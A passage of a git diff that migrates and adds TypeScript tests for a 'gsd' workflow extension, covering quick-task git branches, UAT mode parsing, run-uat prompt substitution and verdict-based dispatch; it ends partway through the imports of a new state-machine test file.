+  assert.ok(QUICK_BRANCH_RE.test("gsd/quick/42-some-long-slug-name"), "matches multi-digit quick branch");
+  assert.ok(!QUICK_BRANCH_RE.test("main"), "rejects main");
+  assert.ok(!QUICK_BRANCH_RE.test("gsd/M001/S01"), "rejects slice branch");
+  assert.ok(!QUICK_BRANCH_RE.test("gsd/quickly-something"), "rejects non-quick prefix");
+  assert.ok(!QUICK_BRANCH_RE.test("feature/gsd/quick/1"), "rejects nested prefix");
   // ═══════════════════════════════════════════════════════════════════════
   // captureIntegrationBranch: guard against quick-task branches
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log("\n=== captureIntegrationBranch: skips quick-task branches ===");
-
-  {
+test('captureIntegrationBranch: skips quick-task branches', () => {
     const repo = createTestRepo();
 
     // Create and checkout a quick-task branch
     run("git checkout -b gsd/quick/1-fix-typo", repo);
-    assertEq(getCurrentBranch(repo), "gsd/quick/1-fix-typo", "on quick branch");
+    assert.deepStrictEqual(getCurrentBranch(repo), "gsd/quick/1-fix-typo", "on quick branch");
 
     captureIntegrationBranch(repo, "M001");
 
-    assertEq(readIntegrationBranch(repo, "M001"), null,
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), null,
       "captureIntegrationBranch is a no-op on quick-task branches");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+});
 
   // ─── Verify main is still recorded correctly ─────────────────────────
-
-  console.log("\n=== captureIntegrationBranch: records main correctly ===");
-
-  {
+test('captureIntegrationBranch: records main correctly', () => {
     const repo = createTestRepo();
 
     // Capture from main — should work normally
     captureIntegrationBranch(repo, "M001");
-    assertEq(readIntegrationBranch(repo, "M001"), "main",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "main",
       "main is recorded as integration branch");
 
     // Switch to quick branch — capture should be no-op (doesn't overwrite main)
     run("git checkout -b gsd/quick/1-fix-typo", repo);
     captureIntegrationBranch(repo, "M001");
-    assertEq(readIntegrationBranch(repo, "M001"), "main",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "main",
       "quick branch does not overwrite existing integration branch");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+});
 
   // ─── Sequence: main → quick → back to main → capture ────────────────
-
-  console.log("\n=== captureIntegrationBranch: correct after quick branch round-trip ===");
-
-  {
+test('captureIntegrationBranch: correct after quick branch round-trip', () => {
     const repo = createTestRepo();
 
     // Simulate quick-task lifecycle: branch off, do work, return to main
@@ -111,19 +101,16 @@ async function main(): Promise<void> {
 
     // Now capture — should get main, not the deleted quick branch
     captureIntegrationBranch(repo, "M002");
-    assertEq(readIntegrationBranch(repo, "M002"), "main",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M002"), "main",
       "after quick round-trip, main is captured correctly");
 
     rmSync(repo, { recursive: true, force: true });
-  }
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // cleanupQuickBranch: in-memory path (same session)
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log("\n=== cleanupQuickBranch: merges back and cleans up (same session) ===");
-
-  {
+test('cleanupQuickBranch: merges back and cleans up (same session)', async () => {
     const repo = createTestRepo();
     const origCwd = process.cwd();
 
@@ -152,33 +139,30 @@ async function main(): Promise<void> {
     // Import and call cleanupQuickBranch
     // Use dynamic import to get a fresh module scope — the in-memory state
     // won't be set, so it will fall through to disk recovery
-    const { cleanupQuickBranch } = await import("../quick.ts");
+    const { cleanupQuickBranch } = await import("../../quick.ts");
     const result = cleanupQuickBranch();
 
-    assertTrue(result, "cleanupQuickBranch returns true");
-    assertEq(getCurrentBranch(repo), "main", "back on main after cleanup");
+    assert.ok(result, "cleanupQuickBranch returns true");
+    assert.deepStrictEqual(getCurrentBranch(repo), "main", "back on main after cleanup");
 
     // Verify merge happened — fix.txt should exist on main
-    assertTrue(existsSync(join(repo, "fix.txt")), "fix.txt merged to main");
+    assert.ok(existsSync(join(repo, "fix.txt")), "fix.txt merged to main");
 
     // Verify quick branch deleted
     const branches = run("git branch", repo);
-    assertTrue(!branches.includes("gsd/quick/1-fix-typo"), "quick branch deleted");
+    assert.ok(!branches.includes("gsd/quick/1-fix-typo"), "quick branch deleted");
 
     // Verify disk state cleaned up
-    assertTrue(!existsSync(join(runtimeDir, "quick-return.json")), "quick-return.json removed");
+    assert.ok(!existsSync(join(runtimeDir, "quick-return.json")), "quick-return.json removed");
 
     process.chdir(origCwd);
     rmSync(repo, { recursive: true, force: true });
-  }
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // cleanupQuickBranch: cross-session recovery from disk
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log("\n=== cleanupQuickBranch: recovers from disk state (cross-session) ===");
-
-  {
+test('cleanupQuickBranch: recovers from disk state (cross-session)', async () => {
     const repo = createTestRepo();
     const origCwd = process.cwd();
 
@@ -203,58 +187,52 @@ async function main(): Promise<void> {
 
     process.chdir(repo);
 
-    const { cleanupQuickBranch } = await import("../quick.ts");
+    const { cleanupQuickBranch } = await import("../../quick.ts");
     const result = cleanupQuickBranch();
 
-    assertTrue(result, "cross-session recovery returns true");
-    assertEq(getCurrentBranch(repo), "main", "back on main after cross-session recovery");
-    assertTrue(existsSync(join(repo, "docs.md")), "docs.md merged to main");
-    assertTrue(!existsSync(join(runtimeDir, "quick-return.json")), "disk state cleaned up");
+    assert.ok(result, "cross-session recovery returns true");
+    assert.deepStrictEqual(getCurrentBranch(repo), "main", "back on main after cross-session recovery");
+    assert.ok(existsSync(join(repo, "docs.md")), "docs.md merged to main");
+    assert.ok(!existsSync(join(runtimeDir, "quick-return.json")), "disk state cleaned up");
 
     process.chdir(origCwd);
     rmSync(repo, { recursive: true, force: true });
-  }
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // cleanupQuickBranch: no-op when no pending state
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log("\n=== cleanupQuickBranch: no-op without pending state ===");
-
-  {
+test('cleanupQuickBranch: no-op without pending state', async () => {
     const repo = createTestRepo();
     const origCwd = process.cwd();
     process.chdir(repo);
 
-    const { cleanupQuickBranch } = await import("../quick.ts");
+    const { cleanupQuickBranch } = await import("../../quick.ts");
     const result = cleanupQuickBranch();
 
-    assertTrue(!result, "returns false when no pending state");
-    assertEq(getCurrentBranch(repo), "main", "stays on main");
+    assert.ok(!result, "returns false when no pending state");
+    assert.deepStrictEqual(getCurrentBranch(repo), "main", "stays on main");
 
     process.chdir(origCwd);
     rmSync(repo, { recursive: true, force: true });
-  }
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // End-to-end: quick branch does NOT contaminate integration branch
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log("\n=== E2E: quick branch does not contaminate integration branch ===");
-
-  {
+test('E2E: quick branch does not contaminate integration branch', () => {
     const repo = createTestRepo();
 
     // 1. Record main as integration branch for M001
     captureIntegrationBranch(repo, "M001");
-    assertEq(readIntegrationBranch(repo, "M001"), "main", "M001 integration = main");
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "main", "M001 integration = main");
 
     // 2. Start a quick task (branch off)
     run("git checkout -b gsd/quick/1-fix-typo", repo);
 
     // 3. Try to capture integration branch for M002 while on quick branch
     captureIntegrationBranch(repo, "M002");
-    assertEq(readIntegrationBranch(repo, "M002"), null,
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M002"), null,
       "M002 integration NOT recorded from quick branch");
 
     // 4. Return to main (simulate cleanupQuickBranch)
@@ -262,20 +240,14 @@ async function main(): Promise<void> {
 
     // 5. Now capture M002 from main — should work
     captureIntegrationBranch(repo, "M002");
-    assertEq(readIntegrationBranch(repo, "M002"), "main",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M002"), "main",
       "M002 integration = main after returning from quick branch");
 
     // 6. Verify M001 still intact
-    assertEq(readIntegrationBranch(repo, "M001"), "main",
+    assert.deepStrictEqual(readIntegrationBranch(repo, "M001"), "main",
       "M001 integration unchanged");
 
     rmSync(repo, { recursive: true, force: true });
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+});
+
 });
diff --git a/src/resources/extensions/gsd/tests/integration/run-uat.test.ts b/src/resources/extensions/gsd/tests/integration/run-uat.test.ts
new file mode 100644
index 000000000..b4427751b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/run-uat.test.ts
@@ -0,0 +1,609 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
+import { join, dirname } from 'node:path';
+import { tmpdir } from 'node:os';
+import { fileURLToPath } from 'node:url';
+
+import { extractUatType } from '../../files.ts';
+import { resolveSliceFile } from '../../paths.ts';
+import { checkNeedsRunUat } from '../../auto-prompts.ts';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const worktreePromptsDir = join(__dirname, '../..', 'prompts');
+
+function loadPromptFromWorktree(name: string, vars: Record<string, string> = {}): string {
+  const path = join(worktreePromptsDir, `${name}.md`);
+  let content = readFileSync(path, 'utf-8');
+  const effectiveVars = {
+    skillActivation: 'If no installed skill clearly matches this unit, skip explicit skill activation and continue with the required workflow.',
+    ...vars,
+  };
+  for (const [key, value] of Object.entries(effectiveVars)) {
+    content = content.replaceAll(`{{${key}}}`, value);
+  }
+  return content.trim();
+}
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-run-uat-test-'));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+function writeSliceFile(
+  base: string,
+  mid: string,
+  sid: string,
+  suffix: string,
+  content: string,
+): void {
+  const dir = join(base, '.gsd', 'milestones', mid, 'slices', sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-${suffix}.md`), content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+function makeUatContent(mode: string): string {
+  return `# UAT File\n\n## UAT Type\n\n- UAT mode: ${mode}\n- Some other bullet: value\n`;
+}
+
+describe('run-uat', () => {
+test('(a) artifact-driven', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('artifact-driven')),
+    'artifact-driven',
+    'plain artifact-driven → artifact-driven',
+  );
+  assert.deepStrictEqual(
+    extractUatType('## UAT Type\n\n- UAT mode: artifact-driven\n'),
+    'artifact-driven',
+    'minimal content, artifact-driven',
+  );
+});
+
+test('(b) live-runtime', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('live-runtime')),
+    'live-runtime',
+    'plain live-runtime → live-runtime',
+  );
+});
+
+test('(c) human-experience', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('human-experience')),
+    'human-experience',
+    'plain human-experience → human-experience',
+  );
+});
+
+test('(d) mixed standalone', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('mixed')),
+    'mixed',
+    'plain mixed → mixed',
+  );
+});
+
+test('(e) mixed parenthetical', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('mixed (artifact-driven + live-runtime)')),
+    'mixed',
+    'mixed (artifact-driven + live-runtime) → mixed (leading keyword only)',
+  );
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('mixed (some other description)')),
+    'mixed',
+    'mixed with arbitrary parenthetical → mixed',
+  );
+});
+
+test('(f) missing UAT Type section', () => {
+  assert.deepStrictEqual(
+    extractUatType('# UAT File\n\n## Overview\n\nSome content.\n'),
+    undefined,
+    'no ## UAT Type section → undefined',
+  );
+  assert.deepStrictEqual(
+    extractUatType(''),
+    undefined,
+    'empty content → undefined',
+  );
+});
+
+test('(g) UAT Type section present, no UAT mode: bullet', () => {
+  assert.deepStrictEqual(
+    extractUatType('## UAT Type\n\n- Some other bullet: value\n- Another bullet\n'),
+    undefined,
+    'section present but no UAT mode: bullet → undefined',
+  );
+  assert.deepStrictEqual(
+    extractUatType('## UAT Type\n\n'),
+    undefined,
+    'section present but empty → undefined',
+  );
+});
+
+test('(h) unknown keyword', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('automated')),
+    undefined,
+    'unknown keyword automated → undefined',
+  );
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('fully-automated')),
+    undefined,
+    'unknown keyword fully-automated → undefined',
+  );
+});
+
+test('(i) extra whitespace', () => {
+  assert.deepStrictEqual(
+    extractUatType('## UAT Type\n\n- UAT mode:   artifact-driven   \n'),
+    'artifact-driven',
+    'leading/trailing whitespace around value → still classified correctly',
+  );
+  assert.deepStrictEqual(
+    extractUatType('## UAT Type\n\n- UAT mode:  mixed (artifact-driven + live-runtime)  \n'),
+    'mixed',
+    'whitespace around mixed parenthetical → mixed',
+  );
+});
+
+test('(j) case sensitivity', () => {
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('Artifact-Driven')),
+    'artifact-driven',
+    'Artifact-Driven (title case) → artifact-driven (function lowercases before matching)',
+  );
+  assert.deepStrictEqual(
+    extractUatType(makeUatContent('MIXED')),
+    'mixed',
+    'MIXED (upper case) → mixed (function lowercases before matching)',
+  );
+});
+
+test('(k) run-uat prompt template', () => {
+  const milestoneId = 'M001';
+  const sliceId = 'S01';
+  const uatPath = '.gsd/milestones/M001/slices/S01/S01-UAT.md';
+  const uatResultPath = '.gsd/milestones/M001/slices/S01/S01-ASSESSMENT.md';
+  const uatType = 'live-runtime';
+  const inlinedContext = '<!-- no context -->';
+  let promptResult: string | undefined;
+  let promptThrew = false;
+  try {
+    promptResult = loadPromptFromWorktree('run-uat', {
+      workingDirectory: '/tmp/test-project',
+      milestoneId,
+      sliceId,
+      uatPath,
+      uatResultPath,
+      uatType,
+      inlinedContext,
+    });
+  } catch {
+    promptThrew = true;
+  }
+  assert.ok(!promptThrew, 'loadPromptFromWorktree("run-uat", vars) does not throw');
+  assert.ok(
+    typeof promptResult === 'string' && promptResult.length > 0,
+    'run-uat prompt result is a non-empty string',
+  );
+  assert.ok(
+    promptResult?.includes(milestoneId) ?? false,
+    `prompt contains milestoneId value "${milestoneId}" after substitution`,
+  );
+  assert.ok(
+    promptResult?.includes(sliceId) ?? false,
+    `prompt contains sliceId value "${sliceId}" after substitution`,
+  );
+  assert.ok(
+    promptResult?.includes(uatResultPath) ?? false,
+    `prompt contains uatResultPath value after substitution`,
+  );
+  assert.ok(
+    promptResult?.includes(`Detected UAT mode:** \`${uatType}\``) ?? false,
+    `prompt contains detected dynamic uatType value "${uatType}" after substitution`,
+  );
+  assert.ok(
+    promptResult?.includes(`uatType: ${uatType}`) ?? false,
+    `prompt contains dynamic uatType frontmatter value "${uatType}" after substitution`,
+  );
+  assert.ok(
+    !/\{\{[^}]+\}\}/.test(promptResult ?? ''),
+    'no unreplaced {{...}} tokens remain after variable substitution',
+  );
+  assert.ok(
+    /browser|runtime|execute|run/i.test(promptResult ?? ''),
+    'prompt contains runtime execution language (browser/runtime/execute/run)',
+  );
+  assert.ok(
+    !/surfaced for human review/i.test(promptResult ?? ''),
+    'prompt does not contain "surfaced for human review" (non-artifact UATs are skipped, not dispatched)',
+  );
+});
+
+test('(k2) run-uat prompt references gsd_summary_save, not direct write', () => {
+  const promptResult = loadPromptFromWorktree('run-uat', {
+    workingDirectory: '/tmp/test-project',
+    milestoneId: 'M001',
+    sliceId: 'S01',
+    uatPath: '.gsd/milestones/M001/slices/S01/S01-UAT.md',
+    uatResultPath: '.gsd/milestones/M001/slices/S01/S01-UAT.md',
+    uatType: 'artifact-driven',
+    inlinedContext: '<!-- no context -->',
+  });
+
+  assert.ok(
+    promptResult.includes('gsd_summary_save'),
+    'run-uat prompt should reference gsd_summary_save tool',
+  );
+  assert.ok(
+    promptResult.includes('artifact_type: "ASSESSMENT"'),
+    'run-uat prompt should specify ASSESSMENT artifact type',
+  );
+  assert.ok(
+    !promptResult.includes('MUST write'),
+    'run-uat prompt should not instruct direct file write in footer',
+  );
+});
+
+test('(l) dispatch preconditions via resolveSliceFile', () => {
+    const base = createFixtureBase();
+    const uatContent = makeUatContent('artifact-driven');
+    try {
+      writeSliceFile(base, 'M001', 'S01', 'UAT', uatContent);
+
+      const uatFilePath = resolveSliceFile(base, 'M001', 'S01', 'UAT');
+      assert.ok(
+        uatFilePath !== null,
+        'resolveSliceFile(..., "UAT") returns non-null when UAT file exists (dispatch trigger state)',
+      );
+
+      // UAT spec without a verdict line means UAT has not been run yet
+      const rawContent = readFileSync(uatFilePath!, 'utf-8');
+      assert.ok(
+        !/verdict:\s*[\w-]+/i.test(rawContent),
+        'UAT file without verdict indicates UAT has not been run (dispatch trigger state)',
+      );
+
+      assert.deepStrictEqual(
+        extractUatType(rawContent),
+        'artifact-driven',
+        'extractUatType on fixture UAT file returns expected type (end-to-end data flow)',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+test('test block at line 307', () => {
+    const base = createFixtureBase();
+    try {
+      // Write UAT file with a verdict — simulates completed UAT
+      writeSliceFile(base, 'M001', 'S01', 'UAT', '# UAT Result\n\nverdict: PASS\n');
+
+      const uatFilePath = resolveSliceFile(base, 'M001', 'S01', 'UAT');
+      assert.ok(
+        uatFilePath !== null,
+        'resolveSliceFile(..., "UAT") returns non-null when UAT file exists',
+      );
+      const content = readFileSync(uatFilePath!, 'utf-8');
+      assert.ok(
+        /verdict:\s*[\w-]+/i.test(content),
+        'UAT file with verdict indicates UAT has been completed (idempotent skip state)',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+test('(m) non-artifact UAT skip', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
+      mkdirSync(roadmapDir, { recursive: true });
+      writeFileSync(
+        join(roadmapDir, 'M001-ROADMAP.md'),
+        [
+          '# M001: Test roadmap',
+          '',
+          '## Slices',
+          '',
+          '- [x] **S01: First slice** `risk:low` `depends:[]`',
+          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
+          '',
+          '## Boundary Map',
+          '',
+        ].join('\n'),
+      );
+
+      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('human-experience'));
+
+      const state = {
+        activeMilestone: { id: 'M001', title: 'Test roadmap' },
+        activeSlice: { id: 'S02', title: 'Next slice' },
+        activeTask: null,
+        phase: 'planning',
+        recentDecisions: [],
+        blockers: [],
+        nextAction: 'Plan S02',
+        registry: [],
+      } as const;
+
+      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
+      assert.deepStrictEqual(
+        result,
+        { sliceId: 'S01', uatType: 'human-experience' },
+        'human-experience UAT dispatches so auto-mode can pause for manual review',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+test('(o) verdict gate: PARTIAL is acceptable for mixed/human-experience/live-runtime UAT types', () => {
+    // This test verifies the contract that extractUatType correctly identifies
+    // the modes where PARTIAL should not block progression.
+    // The verdict gate in auto-dispatch.ts uses this to build acceptableVerdicts.
+    const mixedType = extractUatType(makeUatContent('mixed'));
+    const humanExpType = extractUatType(makeUatContent('human-experience'));
+    const liveRuntimeType = extractUatType(makeUatContent('live-runtime'));
+    const artifactType = extractUatType(makeUatContent('artifact-driven'));
+    const browserType = extractUatType(makeUatContent('browser-executable'));
+    const runtimeExecType = extractUatType(makeUatContent('runtime-executable'));
+
+    // These modes should allow PARTIAL (non-fully-automatable)
+    const partialAcceptableModes = ['mixed', 'human-experience', 'live-runtime'];
+    assert.ok(
+      partialAcceptableModes.includes(mixedType!),
+      `mixed → "${mixedType}" is in partialAcceptableModes`,
+    );
+    assert.ok(
+      partialAcceptableModes.includes(humanExpType!),
+      `human-experience → "${humanExpType}" is in partialAcceptableModes`,
+    );
+    assert.ok(
+      partialAcceptableModes.includes(liveRuntimeType!),
+      `live-runtime → "${liveRuntimeType}" is in partialAcceptableModes`,
+    );
+
+    // These modes should NOT allow PARTIAL (fully automatable)
+    assert.ok(
+      !partialAcceptableModes.includes(artifactType!),
+      `artifact-driven → "${artifactType}" is NOT in partialAcceptableModes`,
+    );
+    assert.ok(
+      !partialAcceptableModes.includes(browserType!),
+      `browser-executable → "${browserType}" is NOT in partialAcceptableModes`,
+    );
+    assert.ok(
+      !partialAcceptableModes.includes(runtimeExecType!),
+      `runtime-executable → "${runtimeExecType}" is NOT in partialAcceptableModes`,
+    );
+});
+
+test('(p) run-uat prompt allows PASS when human-only checks remain as NEEDS-HUMAN', () => {
+    const promptResult = loadPromptFromWorktree('run-uat', {
+      workingDirectory: '/tmp/test-project',
+      milestoneId: 'M001',
+      sliceId: 'S01',
+      uatPath: '.gsd/milestones/M001/slices/S01/S01-UAT.md',
+      uatResultPath: '.gsd/milestones/M001/slices/S01/S01-UAT.md',
+      uatType: 'mixed',
+      inlinedContext: '<!-- no context -->',
+    });
+
+    // PASS verdict should be usable when automatable checks pass (even with NEEDS-HUMAN remaining)
+    assert.ok(
+      /PASS.*automatable checks passed/i.test(promptResult),
+      'prompt defines PASS as valid when all automatable checks passed',
+    );
+    assert.ok(
+      /PARTIAL.*automatable checks.*(skipped|inconclusive)/i.test(promptResult),
+      'prompt reserves PARTIAL for when automatable checks themselves are inconclusive',
+    );
+    // human-experience mode should NOT force PARTIAL when automatable checks pass
+    assert.ok(
+      !promptResult.includes('use an overall verdict of `PARTIAL`'),
+      'prompt does not force PARTIAL verdict for human-experience mode',
+    );
+});
+
+test('(n) stale replay guard', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
+      mkdirSync(roadmapDir, { recursive: true });
+      writeFileSync(
+        join(roadmapDir, 'M001-ROADMAP.md'),
+        [
+          '# M001: Test roadmap',
+          '',
+          '## Slices',
+          '',
+          '- [x] **S01: First slice** `risk:low` `depends:[]`',
+          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
+          '',
+          '## Boundary Map',
+          '',
+        ].join('\n'),
+      );
+
+      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('artifact-driven'));
+      writeSliceFile(base, 'M001', 'S01', 'UAT', '---\nverdict: FAIL\n---\n');
+
+      const state = {
+        activeMilestone: { id: 'M001', title: 'Test roadmap' },
+        activeSlice: { id: 'S02', title: 'Next slice' },
+        activeTask: null,
+        phase: 'planning',
+        recentDecisions: [],
+        blockers: [],
+        nextAction: 'Plan S02',
+        registry: [],
+      } as const;
+
+      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
+      assert.deepStrictEqual(
+        result,
+        null,
+        'existing UAT with FAIL verdict does not re-dispatch; verdict gate owns blocking',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+test('(q) verdict in ASSESSMENT file skips UAT dispatch (file-based path)', async () => {
+    // Regression test for #2644: run-uat prompt writes the verdict to
+    // S{sid}-ASSESSMENT.md (via gsd_summary_save artifact_type:"ASSESSMENT"),
+    // but checkNeedsRunUat only checked S{sid}-UAT.md — causing a stuck loop.
+    const base = createFixtureBase();
+    try {
+      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
+      mkdirSync(roadmapDir, { recursive: true });
+      writeFileSync(
+        join(roadmapDir, 'M001-ROADMAP.md'),
+        [
+          '# M001: Test roadmap',
+          '',
+          '## Slices',
+          '',
+          '- [x] **S01: First slice** `risk:low` `depends:[]`',
+          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
+          '',
+          '## Boundary Map',
+          '',
+        ].join('\n'),
+      );
+
+      // UAT spec file WITHOUT a verdict (the spec never gets one)
+      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('artifact-driven'));
+      // ASSESSMENT file WITH a verdict (where run-uat actually writes it)
+      writeSliceFile(base, 'M001', 'S01', 'ASSESSMENT', '---\nverdict: PASS\n---\n# UAT Assessment\n');
+
+      const state = {
+        activeMilestone: { id: 'M001', title: 'Test roadmap' },
+        activeSlice: { id: 'S02', title: 'Next slice' },
+        activeTask: null,
+        phase: 'planning',
+        recentDecisions: [],
+        blockers: [],
+        nextAction: 'Plan S02',
+        registry: [],
+      } as const;
+
+      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
+      assert.deepStrictEqual(
+        result,
+        null,
+        'verdict in ASSESSMENT file should prevent re-dispatch of run-uat',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+test('(r) no ASSESSMENT file still dispatches UAT (no false skip)', async () => {
+    // Guard: when there is no ASSESSMENT file at all, UAT should still dispatch
+    // normally. The ASSESSMENT check must not cause a false-negative skip.
+    const base = createFixtureBase();
+    try {
+      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
+      mkdirSync(roadmapDir, { recursive: true });
+      writeFileSync(
+        join(roadmapDir, 'M001-ROADMAP.md'),
+        [
+          '# M001: Test roadmap',
+          '',
+          '## Slices',
+          '',
+          '- [x] **S01: First slice** `risk:low` `depends:[]`',
+          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
+          '',
+          '## Boundary Map',
+          '',
+        ].join('\n'),
+      );
+
+      // UAT spec file WITHOUT a verdict, and NO ASSESSMENT file
+      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('artifact-driven'));
+
+      const state = {
+        activeMilestone: { id: 'M001', title: 'Test roadmap' },
+        activeSlice: { id: 'S02', title: 'Next slice' },
+        activeTask: null,
+        phase: 'planning',
+        recentDecisions: [],
+        blockers: [],
+        nextAction: 'Plan S02',
+        registry: [],
+      } as const;
+
+      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
+      assert.deepStrictEqual(
+        result,
+        { sliceId: 'S01', uatType: 'artifact-driven' },
+        'without ASSESSMENT file, UAT still dispatches normally',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+test('(s) ASSESSMENT without verdict does not skip UAT dispatch', async () => {
+    // Guard: an ASSESSMENT file that exists but has no verdict line should
+    // NOT suppress UAT dispatch — only a file with an actual verdict should.
+    const base = createFixtureBase();
+    try {
+      const roadmapDir = join(base, '.gsd', 'milestones', 'M001');
+      mkdirSync(roadmapDir, { recursive: true });
+      writeFileSync(
+        join(roadmapDir, 'M001-ROADMAP.md'),
+        [
+          '# M001: Test roadmap',
+          '',
+          '## Slices',
+          '',
+          '- [x] **S01: First slice** `risk:low` `depends:[]`',
+          '- [ ] **S02: Next slice** `risk:low` `depends:[S01]`',
+          '',
+          '## Boundary Map',
+          '',
+        ].join('\n'),
+      );
+
+      // UAT spec WITHOUT verdict
+      writeSliceFile(base, 'M001', 'S01', 'UAT', makeUatContent('artifact-driven'));
+      // ASSESSMENT file WITHOUT verdict (partial/incomplete assessment)
+      writeSliceFile(base, 'M001', 'S01', 'ASSESSMENT', '# UAT Assessment\n\nStill running checks...\n');
+
+      const state = {
+        activeMilestone: { id: 'M001', title: 'Test roadmap' },
+        activeSlice: { id: 'S02', title: 'Next slice' },
+        activeTask: null,
+        phase: 'planning',
+        recentDecisions: [],
+        blockers: [],
+        nextAction: 'Plan S02',
+        registry: [],
+      } as const;
+
+      const result = await checkNeedsRunUat(base, 'M001', state as any, { uat_dispatch: true } as any);
+      assert.deepStrictEqual(
+        result,
+        { sliceId: 'S01', uatType: 'artifact-driven' },
+        'ASSESSMENT without verdict should not suppress UAT dispatch',
+      );
+    } finally {
+      cleanup(base);
+    }
+});
+
+});
diff --git a/src/resources/extensions/gsd/tests/integration/state-machine-edge-cases.test.ts b/src/resources/extensions/gsd/tests/integration/state-machine-edge-cases.test.ts
new file mode 100644
index 000000000..db7b992c8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/state-machine-edge-cases.test.ts
@@ -0,0 +1,1190 @@
+/**
+ * state-machine-edge-cases.test.ts — Gap-filling tests for the GSD state
+ * machine covering failure modes, boundary conditions, and edge cases NOT
+ * covered by the existing state-machine-live-validation.test.ts suite.
+ *
+ * Coverage gaps filled:
+ * 1. State derivation failures (file deletion races, partial DB, cache staleness,
+ *    corrupt files, 0-slice ROADMAP)
+ * 2. Transition boundary failures (mid-transition mutation, cascading blockers,
+ *    multi-level milestone deps, blocked→unblocked recovery)
+ * 3. Dispatch failures (null activeSlice, evaluating-gates without config,
+ *    unhandled phase, missing task plan recovery)
+ * 4. Completion & verification failures (unparseable verdict, needs-remediation
+ *    blocks completion, missing SUMMARY blocks validation, UAT verdict gate,
+ *    replan loop cap)
+ */
+
+// GSD State Machine Edge Case Tests
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  readFileSync,
+  rmSync,
+  existsSync,
+  unlinkSync,
+} from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+// ── DB layer ──────────────────────────────────────────────────────────────
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+  getSlice,
+  getMilestone,
+  getSliceTasks,
+  getMilestoneSlices,
+  updateTaskStatus,
+  updateSliceStatus,
+  updateMilestoneStatus,
+  insertReplanHistory,
+  getReplanHistory,
+  insertGateRow,
+  getPendingGates,
+} from "../../gsd-db.ts";
+
+// ── State derivation ──────────────────────────────────────────────────────
+import {
+  deriveState,
+  deriveStateFromDb,
+  invalidateStateCache,
+  isGhostMilestone,
+  isValidationTerminal,
+} from "../../state.ts";
+
+// ── Status guards ─────────────────────────────────────────────────────────
+import { isClosedStatus } from "../../status-guards.ts";
+
+// ── Cache invalidation ───────────────────────────────────────────────────
+import { invalidateAllCaches } from "../../cache.ts";
+
+// ── Dispatch ─────────────────────────────────────────────────────────────
+import {
+  resolveDispatch,
+  DISPATCH_RULES,
+  getDispatchRuleNames,
+} from "../../auto-dispatch.ts";
+import type { DispatchContext, DispatchAction } from "../../auto-dispatch.ts";
+
+// ── Verdict parser ──────────────────────────────────────────────────────
+import {
